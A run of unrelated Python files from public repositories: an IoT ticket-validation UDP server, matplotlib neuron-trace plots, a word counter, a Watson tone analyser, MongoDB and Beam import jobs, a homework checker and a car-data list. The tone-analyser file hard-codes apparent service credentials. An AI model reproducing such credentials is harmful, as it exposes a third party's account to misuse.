done.\")\n","repo_name":"chicorycolumn/WiktionaryScraper","sub_path":"utils/sanhedrin_finalise_lobjs_and_create_nexus/S02_doublecheck_trans_of_src_lobjs.py","file_name":"S02_doublecheck_trans_of_src_lobjs.py","file_ext":"py","file_size_in_byte":3040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40547764804","text":"import os\nimport socket\nimport json\nimport DES\nimport base64\nfrom datetime import datetime\nimport dotenv\n\ndotenv.load_dotenv()\nHOST = '0.0.0.0'\nPORT = 8080\nIOT = 8082\n\n\nIOTKEY = base64.b64decode(os.getenv(\"IOTKEY\"))\nauthenticator_set = set()\n\n\ndef validate_ticket(data):\n data_dict = json.loads(data)\n ticket = DES.decrypt(IOTKEY[:8], base64.b64decode(data_dict[\"ticket\"]))\n ticket_dict = json.loads(ticket)\n try:\n sessionkey = base64.b64decode(ticket_dict[\"sessionkey\"])\n authenticator = json.loads(\n DES.decrypt(sessionkey[16:24], base64.b64decode(data_dict[\"authenticator\"])).decode())\n except:\n return None\n timestamp = datetime.strptime(authenticator[\"timestamp\"], '%Y-%m-%d %H:%M:%S.%f')\n lifetime = datetime.strptime(ticket_dict[\"lifetime\"], '%Y-%m-%d %H:%M:%S.%f')\n if authenticator[\"logout\"] == \"True\":\n authenticator_set.clear()\n print(\"authenticator_list:\\n\",authenticator_set)\n return \"Successfully logged out from IoT.\",\"logout\"\n if datetime.now() > lifetime:\n authenticator_set.clear()\n return \"expired\"\n if authenticator[\"username\"] != ticket_dict[\"username\"]:\n return None\n if data_dict[\"server\"] != ticket_dict[\"server\"]:\n return None\n if (authenticator[\"username\"], timestamp) in authenticator_set:\n return None\n authenticator_set.add((authenticator[\"username\"], timestamp))\n print(\"authenticator_list:\\n\",authenticator_set)\n return data_dict[\"command\"]\n\n\ndef iot_device_connect(response):\n serverAddressPort = (\"127.0.0.1\", IOT)\n with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:\n s.sendto(response.encode(), serverAddressPort)\n msgFromServer = s.recvfrom(1024)\n\n return msgFromServer[0]\n\n\nwith socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:\n s.bind((HOST, PORT))\n\n while True:\n bytesAddressPair = s.recvfrom(1024)\n data = bytesAddressPair[0]\n\n address = bytesAddressPair[1]\n\n response = validate_ticket(data.decode())\n if not data:\n break\n\n if response is None:\n s.sendto(b'invalid session!', address)\n elif response == \"expired\":\n s.sendto(b'expired', address)\n elif response[1] == \"logout\":\n s.sendto(response[0].encode(), address)\n else:\n s.sendto(iot_device_connect(response), 
address)\n","repo_name":"pjoseph3/SecureIoT","sub_path":"IoTserver.py","file_name":"IoTserver.py","file_ext":"py","file_size_in_byte":2408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32192770063","text":"import numpy as np\nfrom matplotlib import pyplot as plt\nplt.style.use('K_PAPER')\nfrom glob import glob\nimport os\nfrom scipy import stats\nfrom scipy.signal import find_peaks\nfrom ExternalFunctions import Chi2Regression\nfrom iminuit import Minuit\nfrom mpl_toolkits.axes_grid1.inset_locator import inset_axes\nimport matplotlib as mpl\n\ndef rm(x, N):\n return np.convolve(x, np.ones(N)/N, mode='valid')\n\n\ndef func(path):\n # fnames = fnames[:5]\n\n # fnames_soma = fnames[1::2]\n fnames_trunk = glob(f'{path}/trunk?*.npy')\n fnames_trunk.sort(key=os.path.getctime)\n\n\n colors = ['darkgrey', 'dodgerblue', 'goldenrod']\n\n data = np.zeros((3,8,len(fnames_trunk)))\n\n\n for l, fname in enumerate(fnames_trunk):\n trunk = np.load(fname)[::-1]\n bin_ = []\n \n if l == 0:\n fig, ax = plt.subplots(3,1, figsize = (7,6), sharey = True, sharex = True)\n for i in range(len(trunk)):\n inds, _ = find_peaks(trunk[i], height = -30)\n # for idx in inds:\n # trunk[i][idx - 55:idx + 55] = np.mean(trunk[i][idx+55:idx+60])\n\n if i%3 == 0:\n baseline = np.mean(trunk[i][1000:2000])\n print(trunk[i].shape)\n # fig, ax = plt.subplots(1,1, figsize = (7,6))\n trunk_tmp = trunk[i][15000:70000] - baseline\n # trunk_tmp[trunk_tmp > 30] = 30\n area = np.trapz(trunk_tmp, dx = .001)\n bin_.append(area)\n # ax.plot(rm(trunk[i] - baseline, 3000), color = colors[i], lw = 2)\n # ax.plot(rm(trunk[i][15000:70000], 1), color = colors[i], lw = 2)\n # ax[i%3].plot(rm(trunk[i][:], 1), color = colors[i%3], lw = 2)\n import matplotlib as mpl\n time = np.linspace(0,100,4000)\n ax[i%3].plot(time, rm(trunk[i][14000:18000], 1), color = plt.cm.cool_r((i//3)/8), lw = 2)\n cbaxes = inset_axes(ax[0], width=\"5%\", height=\"200%\", loc = 5)\n plt.colorbar(plt.cm.ScalarMappable(norm = mpl.colors.Normalize(vmin=600, vmax=1200), cmap = 'cool_r'), orientation = 'vertical',cax=cbaxes, label = '$Length$')\n # ax.text(-0.1, 1.05, 'E', fontweight = 'bold', transform = ax.transAxes, fontsize = 20)\n # if i%3 == 2:\n # ax.legend(['No shift', 'Low', 'High'], title = '$\\Delta E_k$')\n # ax.set(xlabel = 'Time[AU]', ylabel = 'Trunk Vm minus baseline')\n # # ax.set_xticks([])\n # # ax.set_yticks([])\n # # plt.savefig('AOC_plot', dpi = 200)\n plt.savefig('FIG_4E_CB.svg', dpi = 400)\n plt.savefig('FIG_4E_CB.pdf', dpi = 400)\n plt.show()\n\n\n exit()\n\n # data[:,:,l] = np.array(bin_).reshape(8,3).T\n #\n # t_test = np.zeros((2,8))\n # residuals_arr = np.zeros((2,8,len(fnames_soma)))\n # T_large = np.zeros(2)\n # R_val = np.zeros(2)\n #\n #\n # for i in range(8):\n # for j in range(2):\n # residuals = np.diff(data[[0,j+1], i, :], axis = 0).ravel()\n # residuals_arr[j,i,:] = residuals\n # sdom = np.std(residuals, ddof = 1)/np.sqrt(len(residuals))\n # t = np.mean(residuals) / sdom\n # # print(stats.t.sf(t, len(residuals)-1))\n # t_test[j,i] = stats.t.sf(t, len(residuals)-1)\n # for i in range(2):\n # residuals = residuals_arr[i,:,:].ravel()\n # sdom = np.std(residuals, ddof = 1)/np.sqrt(len(residuals))\n # t = np.mean(residuals) / sdom\n # T_large[i] = stats.t.sf(t, len(residuals)-1)\n # R_val[0] = t\n # R_val[1] = len(residuals)-1\n # mean = np.mean(data, axis = 2)\n # eom = np.std(data, axis = 2)/np.sqrt(data.shape[2])\n # return mean, eom, t_test, residuals_arr, T_large, R_val\n\n# 
paths = ['./new_tt/*.npy']#,\npaths = ['./folder_trunk_test/']#,\n # './no_cluster/*.npy']\ntrunk_lenghts = np.arange(100,900,100) + 300\n\nmean, eom, t_test, residuals, T_large, R_val = func(paths[0])\n# mean_n, eom_n, t_test, residuals, T_large, R_val = func(paths[1])\n\nfig, ax = plt.subplots(1,1, figsize = (7,6))\nax.text(-0.1, 1.05, 'G', fontweight = 'bold', transform = ax.transAxes, fontsize = 20)\ndef func(x,a,b):\n return a*x + b\n\ncolors = ['darkgrey', 'dodgerblue', 'goldenrod']\n\nfor i in range(3):\n fit_chi2 = Chi2Regression(func, trunk_lenghts, mean[i,:], eom[i:])\n minuit_chi2 = Minuit(fit_chi2, a=0.0, b=0.0)\n minuit_chi2.errordef = 1.0\n minuit_chi2.migrad()\n ax.plot(trunk_lenghts, func(trunk_lenghts, *minuit_chi2.values[:]), color = colors[i])\n print(minuit_chi2.values[:])\n print(minuit_chi2.errors[:])\n print(stats.chi2.sf(minuit_chi2.fval, len(trunk_lenghts) - 2))\n\n# for i in range(3):\n # fit_chi2 = Chi2Regression(func, trunk_lenghts, mean_n[i,:], eom_n[i:])\n # minuit_chi2 = Minuit(fit_chi2, a=0.0, b=0.0)\n # minuit_chi2.errordef = 1.0\n # minuit_chi2.migrad()\n # ax.plot(trunk_lenghts, func(trunk_lenghts, *minuit_chi2.values[:]), color = colors[i], ls = '--')\n # print(minuit_chi2.values[:])\n # print(minuit_chi2.errors[:])\n\n\n\nax.errorbar(trunk_lenghts, mean[0,:], eom[0,:], ls = '', capsize = 4, color = colors[0], marker = 'D')\nax.errorbar(trunk_lenghts, mean[1,:], eom[1,:], ls = '', capsize = 4, color = colors[1], marker = 'D')\nax.errorbar(trunk_lenghts, mean[2,:], eom[2,:], ls = '', capsize = 4, color = colors[2], marker = 'D')\n\n# ax.errorbar(trunk_lenghts, mean_n[0,:], eom_n[0,:], ls = '', capsize = 4, color = colors[0], marker = 'x')\n# ax.errorbar(trunk_lenghts, mean_n[1,:], eom_n[1,:], ls = '', capsize = 4, color = colors[1], marker = 'x')\n# ax.errorbar(trunk_lenghts, mean_n[2,:], eom_n[2,:], ls = '', capsize = 4, color = colors[2], marker = 'x')\nax.legend(['No shift', 'Low shift', 'High shift'], title = '$\\Delta E_K$')\nax.set(xlabel = 'Trunk lenghts[um]', ylabel = 'AOC [AU]', title = 'AOC as function of trunklenght')\n# plt.savefig('AOC_compar', dpi = 200)\nplt.savefig('FIG_4G.svg', dpi = 400)\nplt.savefig('FIG_4G.pdf', dpi = 400)\nplt.show()\n\n\n\n\n\n\n\n\n","repo_name":"malthenielsen/Potassium_hotspots","sub_path":"fractal_neuron/trunk_test/trace_plot.py","file_name":"trace_plot.py","file_ext":"py","file_size_in_byte":6194,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"25616271413","text":"def replaceSymbols(string):\r\n for char in string:\r\n if char in \"~!@#$%^&()[]{},+-*|/?<>'.;:\\\"\":\r\n string = string.replace(char, ' ')\r\n return string \r\n\r\ndef counts(string):\r\n wordlist = string.split()\r\n for word in wordlist:\r\n if word in result:\r\n result[word] = result[word] + 1\r\n else:\r\n result[word] = 1\r\n\r\nfileObject = open(\"PPAP.txt\", \"r\")\r\nsong = fileObject.read()\r\nfileObject.close()\r\n\r\nresult = {}\r\ntmp = replaceSymbols(song.lower())\r\ncounts(tmp)\r\n\r\nprint(result)\r\n\r\n\r\n","repo_name":"MyDearGreatTeacher/python2022","sub_path":"教科書/Ch07/file2.py","file_name":"file2.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"21729364023","text":"import json\nfrom watson_developer_cloud import ToneAnalyzerV3\nfrom sentimental import *\nimport ast\nimport pandas as pd\nfrom ss import *\n\n\n# ton analyser class that takes comments and return 
mood status according to it.\nclass TonAna:\n    def statusfun(self):\n        tone_analyzer = ToneAnalyzerV3(version='2018-08-01', username='5aab6b7d-c06c-4105-aa4e-9fd81030451c',\n                                       password='lPH5HXLmrDdN',\n                                       url='https://gateway.watsonplatform.net/tone-analyzer/api')\n        # temp = Senti()\n        # res = temp.sentiments()\n        # text = res\n\n        temp = TwitterClient()\n        res = temp.tweetsanalyse()\n        text = res\n        print(\"this is about Twitter!\")\n\n        tone_analysis = tone_analyzer.tone({'text': text}, 'application/json').get_result()\n        output = json.dumps(tone_analysis, indent=2)\n        x = ast.literal_eval(output)\n        fin = x['document_tone']['tones']\n        df = pd.DataFrame(fin)\n        mood = df.loc[0]['tone_name']\n        print(mood)\n        return mood\n\n\nif __name__ == '__main__':\n    obj = TonAna()\n    obj.statusfun()\n","repo_name":"hardik-dadhich/Sentiment_analysis_desktopApp","sub_path":"tonanalyser.py","file_name":"tonanalyser.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25265030081","text":"import os, pymongo, time\n\ndef getConfig():\n\tfile = open('../../config.js', \"r\")\n\treadFile = file.read()\n\tfor line in readFile.splitlines():\n\t\tif 'mongodb_path' in line:\n\t\t\tmongodb_path = line.split('\\'')[3]\n\t\tif 'DB_USER' in line:\n\t\t\tDB_USER = line.split('\\'')[3]\n\t\tif 'mongodb_url' in line:\n\t\t\tmongodb_url = line.split('\\'')[3]\n\t\tif 'partition' in line:\n\t\t\tpartition = line.split('\\'')[3]\n\tfile.close()\n\treturn mongodb_path, DB_USER, mongodb_url, partition\n\nmongodb_path, DB_USER, mongodb_url, partition = getConfig()\nmongo_path = \"cd \" + mongodb_path\nmongoimport = \"mongoimport --db \" + DB_USER + \" --collection \"\nimport_condition = \" --drop --file \"\njson_path = os.path.abspath(os.path.join(os.getcwd(), \"../load\"))\njson_list = os.listdir(json_path)\njson_list.sort()\n\ndef getFileDate(csv_filename):\n\tfilenameSplit = csv_filename.split(\"_\")\n\tmade = filenameSplit[len(filenameSplit)-1]\n\treturn made.replace(\".csv\", \"\")\n\ndef getLatestDate():\n\tfor x in pymongo.MongoClient(mongodb_url)[DB_USER][partition].find({\"_id\":\"metadata\"}, { \"_id\": 0, \"latestUpdate\":1}):\n\t\tlatestUpdate = x[\"latestUpdate\"]\n\t\treturn latestUpdate\n\ndef jsonToDB():\n\n\tlatestUpdate = getLatestDate()\n\tlatestUpdate = time.strptime(latestUpdate, \"%Y-%m-%d\")\n\tfor f in json_list:\n\t\tif f.find('.json') != -1:\n\t\t\tcollection_name = f.replace('.json', '')\n\t\t\tcollection_date = time.strptime(collection_name.split(\"_\")[1], \"%Y%m%d\")\n\t\t\tif latestUpdate <= collection_date:\t\t\t\n\t\t\t\timport_cmd = mongoimport + collection_name + import_condition + json_path + \"\\\\\" +f\n\t\t\t\tos.system(mongo_path + \" && \" + import_cmd)\n\t#print(\"Complete : json to mongoimport\")\n\njsonToDB()","repo_name":"minkky/2018-KISTI","sub_path":"2018-KISTI/public/data/jsonToDB.py","file_name":"jsonToDB.py","file_ext":"py","file_size_in_byte":1629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24030298562","text":"from langchain.chat_models import ChatOpenAI\n\n# from langchain.schema import AIMessage  # AIMessage is the type for response messages\nfrom langchain.schema import HumanMessage, SystemMessage\n\nfrom measurer import Measurer\n\nchat = ChatOpenAI()\nchat_model_measurer = Measurer(\"chat_model\")\n\n\ndef messages_in_message_out_without_system_message():\n    # AIMessage(content=\"J'aime programmer.\", additional_kwargs={})\n    
chat_model_measurer.start_time(\"messages_in_message_out_without_system_message\")\n result = chat(\n [\n HumanMessage(\n content=(\n \"Translate this sentence from English to Japanese: \"\n \"I love programming.\"\n ),\n ),\n ]\n )\n chat_model_measurer.end_time(\"messages_in_message_out_without_system_message\")\n\n print(result)\n print(\n (\n \"response time: \"\n f\"{chat_model_measurer.time_result('messages_in_message_out_without_system_message')}\"\n )\n )\n\n\ndef messages_in_message_out_with_system_message():\n messages = [\n SystemMessage(\n content=\"You are a helpful assistant that translates English to Japanese.\"\n ),\n HumanMessage(content=\"I love programming\"),\n ]\n\n chat_model_measurer.start_time(\"messages_in_message_out_with_system_message\")\n result = chat(messages)\n chat_model_measurer.end_time(\"messages_in_message_out_with_system_message\")\n\n print(result)\n print(\n (\n \"response time: \"\n f\"{chat_model_measurer.time_result('messages_in_message_out_with_system_message')}\"\n )\n )\n\n\ndef batch_calls_richer_outputs():\n batch_messages = [\n [\n SystemMessage(\n content=\"You are a helpful assistant that translates English to Japanese.\"\n ),\n HumanMessage(\n content=\"I love programming\",\n ),\n ],\n [\n SystemMessage(\n content=\"You are a helpful assistant that translates English to Japanese.\"\n ),\n HumanMessage(\n content=\"I love artificial intelligence.\",\n ),\n ],\n ]\n\n chat_model_measurer.start_time(\"batch_calls_richer_outputs\")\n result = chat.generate(batch_messages)\n chat_model_measurer.end_time(\"batch_calls_richer_outputs\")\n\n print(result)\n print(\n (\n \"response time: \"\n f\"{chat_model_measurer.time_result('batch_calls_richer_outputs')}\"\n )\n )\n\n\nif __name__ == \"__main__\":\n messages_in_message_out_without_system_message()\n messages_in_message_out_with_system_message()\n batch_calls_richer_outputs()\n results = chat_model_measurer.all_time_result(\n \"messages_in_message_out_without_system_message\"\n )\n for name, response_time in results.items():\n print(f\"{name}: {response_time}\")\n","repo_name":"S-Tatsuya/survey_langchain","sub_path":"measurement/src/chat_model.py","file_name":"chat_model.py","file_ext":"py","file_size_in_byte":2899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3017387775","text":"import datetime\n\nfrom server import data, util\nfrom server.apis import geo\n\ndef spoolRevToFixed(it):\n try:\n while True:\n it.prev()\n if it.current().startTime is not None:\n return it\n except StopIteration:\n return None\n\nclass CommutePlanner:\n def __init__(self, options=['walking', 'walking', 'bicycling', 'transit']):\n self.options = options\n\n def plan(self, a, b, arrival_time, g):\n fastest = None\n for o in self.options:\n l = g.directions(a, b, arrival_time, mode=o)[0][\"legs\"][0]\n duration = datetime.timedelta(seconds=l[\"duration\"][\"value\"])\n if \"departure_time\" in l:\n startTime = datetime.datetime.fromtimestamp(l[\"departure_time\"][\"value\"])\n else:\n startTime = arrival_time - duration\n\n if fastest is None or duration < fastest.duration:\n fastest = data.Event(startTime, duration, a, \"commute by \"+o)\n\n return fastest\n\n\ndef plan(timeline, g, cp):\n # we plan backwards\n it = spoolRevToFixed(timeline.end())\n if it is None:\n return timeline\n\n s = data.State(it.current())\n\n newEvents = []\n try:\n while True:\n it.prev()\n if it.current().location is not None and s.location != it.current().location:\n e = 
cp.plan(it.current().location, s.location, s.now, g)\n s.updateRev(e)\n newEvents.append(e)\n\n e = it.current()\n s.updateRev(e)\n e.startTime = s.now\n e.location = s.location\n newEvents.append(e)\n\n except StopIteration:\n pass\n\n return data.Timeline(reversed(newEvents))\n","repo_name":"Wassasin/superplan","sub_path":"server/plan.py","file_name":"plan.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"42491884185","text":"from subprocess import call\nfrom pathlib import Path\nfrom os import walk\nimport hashlib\nimport argparse\nimport sys\nimport logging\nfrom shutil import copyfile\nfrom filecmp import cmp as diff\n\n\ndef run_system_command(cmd: str,\n shell: bool = False,\n err_msg: str = None,\n verbose: bool = True,\n split: bool = True,\n stdout=None,\n stderr=None) -> int:\n \"\"\"\n :param cmd: A string with the terminal command invoking an external program\n :param shell: Whether the command should be executed through the shell\n :param err_msg: Error message to print if execution fails\n :param verbose: Whether to print the command to the standard output stream\n :param split: Whether to split the tokens in the command string\n :param stdout: file pointer to redirect stdout to\n :param stderr: file pointer to redirect stderr to\n :return: Return code\n \"\"\"\n if verbose:\n sys.stdout.write(\"Run cmd: {}\\n\".format(cmd))\n if split:\n cmd = cmd.split()\n rc = call(cmd, shell=shell, stdout=stdout, stderr=stderr)\n if err_msg and rc:\n sys.stderr.write(err_msg)\n exit(rc)\n return rc\n\n\ndef setup_logging(args):\n msg_format = '%(asctime)s:%(levelname)s: %(message)s'\n formatter = logging.Formatter(msg_format, datefmt='%H:%M:%S')\n handler = logging.StreamHandler()\n handler.setFormatter(formatter)\n logging.getLogger().addHandler(handler)\n logging.getLogger().setLevel(logging.DEBUG)\n\n\ndef check_makefile(args):\n options = [\"makefile\", \"./Makefile\"]\n rules = [\"build\", \"run-p1\", \"run-p2\", \"run-best\"]\n\n for file in options:\n file = Path(file)\n if file.exists():\n logging.info(\"Found Makefile!\")\n\n with open(file, \"r\") as f:\n content = f.read()\n for rule in rules:\n if rule not in content:\n logging.warning(\n \"Rule {} not found in Makefile!\".format(rule))\n elif rule == \"build\":\n call(\"make build\", shell=True)\n break\n else:\n logging.critical(\"No Makefile found!\")\n\n\ndef check_readme(args):\n options = [\"README\", \"readme\", \"Readme\"]\n\n for file in options:\n file = Path(file)\n if file.exists():\n logging.info(\"Found Readme\")\n with open(file, \"r\") as f:\n content = f.read()\n if len(content) < 10:\n logging.warning(\n \"Readme file is very short - be sure to include all the required information\")\n break\n else:\n logging.critical(\"No README file found!\")\n\n\ndef check_tests(args):\n tests = []\n input_path = Path(\"./in\")\n if args.unique_tests:\n output_path = Path(\"./out/{}\".format(args.algo))\n else:\n output_path = Path(\"./out\")\n\n if not input_path.exists() or not input_path.is_dir():\n logging.critical(\"No folder for the input tests found!\")\n return None\n\n if not output_path.exists() or not output_path.is_dir():\n logging.critical(\"No folder for the output tests found!\")\n return None\n\n for (_, _, input_tests) in walk(input_path):\n\n input_tests = [file for file in input_tests if file.endswith(\".in\")]\n if len(input_tests) < 10:\n logging.critical(\n \"Only {} input tests 
generated!\".format(len(input_tests)))\n else:\n logging.info(\"Found {} tests.\".format(len(input_tests)))\n\n unique = set()\n for test in input_tests:\n contents = open(input_path / test, \"r\").read().encode(\"utf-8\")\n checksum = hashlib.md5(contents).hexdigest()\n unique.add(checksum)\n\n if len(input_tests) != len(unique):\n logging.critical(\n \"Unique tests: {} / {}!\".format(len(unique), len(input_tests)))\n\n for (_, _, output_tests) in walk(output_path):\n\n output_tests = [file for file in output_tests if file.endswith(\".out\")]\n\n for test in output_tests:\n test_id = test[:-4].replace(\"test\", \"\")\n test_out = \"test{}.out\".format(test_id)\n if test_out not in output_tests:\n logging.critical(\n \"Missing output test for test {}!\".format(test_id))\n else:\n tests.append((test_id,\n input_path / \"test{}.in\".format(test_id),\n output_path / \"test{}.out\".format(test_id)))\n\n return tests\n\n\ndef check_folder_structure(args):\n check_makefile(args)\n check_readme(args)\n return check_tests(args)\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--algo', type=str,\n help=\"Tells makefile which rule to run (e.g. --algo p1 will trigger rule make run-p1\",\n required=True)\n parser.add_argument('--unique-tests', dest='unique_tests',\n help=\"Set this to True if each algorithm has different tests\",\n action='store_true')\n parser.add_argument('--task', type=int,\n help=\"Task ID (e.g. --task 1 for Max Flow\",\n required=True)\n parser.add_argument('--run-test', type=int)\n parser.set_defaults(unique_tests=False)\n args = parser.parse_args()\n setup_logging(args)\n\n tests = check_folder_structure(args)\n for id, input_path, output_path in tests:\n logging.info(\"Running run-{} test {}..\".format(args.algo, id))\n copyfile(input_path, \"./test.in\")\n call(\"make run-{}\".format(args.algo), shell=True)\n if not diff(output_path, \"./test.out\"):\n logging.critical(\"Error trying to run test {}\".format(id))\n logging.info(\"Done!\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"AlexandraImbrisca/example","sub_path":"unique_tests/checker.py","file_name":"checker.py","file_ext":"py","file_size_in_byte":5939,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"39679109942","text":"# -*- coding: utf-8 -*-\nfrom commons.repository import Repository\nfrom interets_parlementaires.db import mysql_db\n\nParlementarianDataType = {\n 1: u'donnees_personnelles',\n 2: u'activites_professionnelles',\n 3: u'activites_pro_5ans',\n 4: u'activites_conseil',\n 5: u'organes_dirigeants',\n 6: u'participations_financieres',\n 7: u'activites_conjoint',\n 8: u'fonctions_benevoles',\n 9: u'fonctions_mandats',\n 10: u'collaborateurs',\n 11: u'activites_conservees',\n 12: u'observations',\n 13: u'dates_reception',\n}\n\n\nclass ParlementaireRepository(Repository):\n def __init__(self, db=mysql_db):\n super(ParlementaireRepository, self).__init__(db)\n\n def get_parlementaires(self, ptype='all'):\n if ptype == 'all':\n like = '%'\n elif ptype == 'depute':\n like = 'http://www.nosdeputes.fr%'\n elif ptype == 'senateur':\n like = 'http://www.nossenateurs.fr%'\n\n sql = \"SELECT DISTINCT parlementaire FROM documents WHERE parlementaire_avatarurl LIKE %s\"\n self.cursor.execute(sql, (like,))\n return [row['parlementaire'] for row in self.cursor.fetchall()]\n\n def get_data_by_type(self, type):\n sql = \"\"\"SELECT parlementaire, data FROM tasks, documents\n WHERE documents.selected_task = tasks.id AND 
done = 1 AND type = %s\n \"\"\"\n self.cursor.execute(sql, (type,))\n return self.cursor.fetchall()\n\n\n","repo_name":"fmassot/rc-tools","sub_path":"interets_parlementaires/repository.py","file_name":"repository.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"38337173854","text":"#!/usr/bin/env python3\n\n\nimport zmq\nimport sys\nimport json\n\n# from zhelpers import dump\n\n\ndef loopback(header_dict, zmq_message):\n \"\"\" Return back the event. \"\"\"\n msg_list = []\n resp_dict = {\"control\": \"back\"}\n next_pos = 0\n json_header = json.dumps(resp_dict)\n msg_list.insert(next_pos, json_header.encode())\n next_pos += 1\n\n if 'True' == header_dict.get('payload', 'False'):\n msg_list.insert(next_pos, zmq_message[1])\n next_pos += 1\n pass\n msg_list.insert(2, '[END]'.encode())\n next_pos += 1\n print(\"Looping Back...\")\n return msg_list\n\n\ndef ping(header_dict, zmq_message):\n \"\"\" Answer ping. \"\"\"\n msg_list = []\n resp_dict = {\"control\": \"pong\"}\n next_pos = 0\n json_header = json.dumps(resp_dict)\n msg_list.insert(next_pos, json_header.encode())\n next_pos += 1\n\n if 'True' == header_dict.get('payload', 'False'):\n msg_list.insert(next_pos, zmq_message[1])\n next_pos += 1\n pass\n msg_list.insert(2, '[END]'.encode())\n next_pos += 1\n print(\"Pinging...\")\n return msg_list\n\n\ndef handle_message(zmq_message):\n \"\"\" Handle all messages and return and event. \"\"\"\n evt_dict = json.loads(zmq_message[0].decode())\n dispatcher_ftn = control_dict[evt_dict['control']]\n evt_response = dispatcher_ftn(evt_dict, zmq_message)\n return evt_response\n\n\ndef terminate(zmq_message):\n \"\"\" End the server. \"\"\"\n if not zmq_message:\n return True\n evt_dict = json.loads(zmq_message[0].decode())\n return 'terminate' == evt_dict['control']\n\ncontrol_dict = {'loop': loopback,\n 'ping': ping,\n 'terminate': terminate\n }\n\n\nif __name__ == '__main__':\n if len(sys.argv) < 2:\n print('I: Syntax: %s ' % sys.argv[0])\n sys.exit(0)\n\n endpoint = sys.argv[1]\n context = zmq.Context()\n server = context.socket(zmq.REP)\n server.bind(endpoint)\n\n print('I: Echo service is ready at %s' % endpoint)\n while True:\n msg = server.recv_multipart()\n if terminate(msg):\n print(\"Terminating...\")\n break # Interrupted\n msg_list = handle_message(msg)\n # dump(msg_list)\n server.send_multipart(msg_list)\n\n server.setsockopt(zmq.LINGER, 0) # Terminate immediately\n","repo_name":"michelav/cloud-detours","sub_path":"core/tests/loopback.py","file_name":"loopback.py","file_ext":"py","file_size_in_byte":2300,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"33690155764","text":"# Read csv file to console\n\nimport csv\n\nwith open('test.txt', 'r') as my_file:\n words = my_file.read()\n\n print(words)\n\n\n\n\n# Read file and count how many times the same word appears\n\nfile = open('test.txt', 'r')\n\nfrom collections import Counter\nwordCount = Counter(file.read().split())\n\nfor item in wordCount.items(): \n # the {} are formatters and items is put inside the brackets\n print(\"{}\\t{}\".format(*item))\n\n\n\n\n# Read file and count how many are in each category\n\nfrom collections import Counter\n\ndef main():\n with open('test2.txt') as file:\n for line in file:\n line = line.split(\"/\")[2]\n print(line)\n \nmain()\n\n# while line:\n# categoryCount = Counter(line)\n\n# for item in categoryCount.items():\n# 
print(\"{}\\t{}\".format(*item))\n","repo_name":"oliviaclyde/hello-world","sub_path":"practice-python/Read_File.py","file_name":"Read_File.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17168038689","text":"# beam gs text to gs text\n\nimport apache_beam as beam\nimport re\n\nPROJECT = 'nickapi-184104'\nBUCKET = 'mysb'\n\n\ndef run():\n argv = [\n '--project={0}'.format(PROJECT),\n '--job_name=examplejob2',\n '--save_main_session',\n '--staging_location=gs://{0}/staging/'.format(BUCKET),\n '--temp_location=gs://{0}/staging/'.format(BUCKET),\n '--runner=DataflowRunner'\n ]\n\n p = beam.Pipeline(argv=argv)\n\n inp = 'gs://{0}/test/kl.txt'.format(BUCKET)\n output_prefix = 'gs://{0}/test/output'.format(BUCKET)\n\n (p\n | beam.io.ReadFromText(inp)\n | beam.FlatMap(lambda x: re.findall(r'[A-Za-z\\']+', x))\n | beam.combiners.Count.PerElement()\n | beam.Map(lambda word_count: '%s: %s' % (word_count[0],\n word_count[1]))\n | beam.io.WriteToText(output_prefix)\n )\n\n p.run()\n\n\nif __name__ == '__main__':\n run()\n","repo_name":"nrkfeller/traffic_chicago","sub_path":"test/word_count_on_cloud.py","file_name":"word_count_on_cloud.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"7855393120","text":"input_list1 = [('City', 'Bakı'), ('Brand', 'Infiniti'),\n ('Model', 'Q50'), ('ProdYear', '2020'),\n ('BanType', 'Sedan'),\n ('Color', 'Boz'), ('EngVol', '2.0'),\n ('EngPow', '211'), ('FuelType', 'Benzin'),\n ('RideDist', '0'), ('Gearbox', 'Avtomat'),\n ('Transmission', 'Arxa'), ('Barter', '1'),\n ('YungulLehimliDiskler', '1'), ('Condisioner', '1'),\n ('Lyuk', '1'), ('RainSensor', '1'),\n ('MerkeziQapanma', '1'), ('ParKRadar', '1'),\n ('LeatherSalon', '1'), ('SeatHeat', '1'),\n ('KsenonLamps', '1'),\n ('YanPerdeler', '1'), ('BackVisionCam', '1'), ('ABS', '1')]\n# $38.500\n\ninput_list2 = [('City', 'Bakı'), ('Brand', 'Kia'),\n ('Model', 'Cerato'), ('ProdYear', '2011'),\n ('BanType', 'Sedan'),\n ('Color', 'Qara'), ('EngVol', '1.6'),\n ('EngPow', '126'), ('FuelType', 'Benzin'),\n ('RideDist', '133000'), ('Gearbox', 'Avtomat'),\n ('Transmission', 'Ön'),\n ('YungulLehimliDiskler', '1'), ('Condisioner', '1'),\n ('ABS', '1'), ('ParKRadar', '1'),\n ('BackVisionCam', '1')] # 16000\n\ninput_list3 = [('City', 